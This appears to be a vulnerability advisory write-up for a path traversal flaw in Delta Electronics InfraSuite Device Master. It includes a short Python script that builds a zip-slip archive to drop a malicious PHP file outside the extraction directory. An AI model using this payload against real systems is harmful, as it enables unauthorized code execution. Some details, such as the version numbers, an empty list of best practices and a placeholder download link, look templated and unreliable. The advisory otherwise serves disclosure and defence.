CVE-2022-41772: Delta Electronics InfraSuite Device Master Path Traversal Vulnerability Leading to Remote Code Execution

Introduction:
Delta Electronics InfraSuite Device Master is a popular software widely used to manage infrastructures in data centers. Versions 00.00.01a and prior of this software are found to be vulnerable to path traversal attacks due to the mishandling of .ZIP archives containing certain path traversal characters. Attackers can exploit this vulnerability to execute remote code and potentially gain unauthorized access to the affected system.

Details of the vulnerability:
The CVE-2022-41772 vulnerability exists in Delta Electronics InfraSuite Device Master versions 00.00.01a and prior. These versions are found to improperly validate and sanitize the filenames of .ZIP archives, which may result in path traversal attacks. Attackers can exploit this vulnerability by crafting specially crafted .ZIP files, which make use of "../" (dot-dot-slash) sequences that result in path traversal.

The vulnerability occurs because the software does not properly validate and sanitize the filenames within the .ZIP archive. In the affected versions, the filenames can include "../" (dot-dot-slash) sequences that result in accessing directories outside of the intended scope.

Exploit:

Here is an example of a simple exploit that demonstrates the vulnerability

from zipfile import ZipFile

malicious_file = 'malicious_file.php'
target_directory = '../../../../../../target_directory/'

with ZipFile('exploit.zip', 'w') as zipf:
    zipf.write(malicious_file, target_directory + malicious_file)

This Python script creates a .ZIP file containing a malicious PHP file. The target_directory variable is set to a path containing multiple "../" (dot-dot-slash) sequences. When the resulting exploit.zip file is uploaded to the affected device, the malicious file is extracted and placed in the target directory, which may lead to remote code execution.

Mitigation

Delta Electronics has acknowledged the vulnerability and recommends users to update their InfraSuite Device Master software to version 00.00.02 or later to address the issue. The updated version includes better validation and sanitization of .ZIP filenames, preventing path traversal attacks.

You can download the updated version from the official website:
Delta Electronics InfraSuite Device Master Version 00.00.02 Download

In addition to updating the software, it is crucial for users to follow best practices in securing their systems, including but not limited to:

Original references

- CVE-2022-41772 | NVD
- Delta Electronics Advisory

Conclusion

The CVE-2022-41772 vulnerability in Delta Electronics InfraSuite Device Master versions 00.00.01a and prior could lead to path traversal attacks and result in remote code execution. Affected users are strongly advised to update their software to the latest version and follow best practices to ensure the security of their systems.

Timeline

Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/02/2022 14:04:00 UTC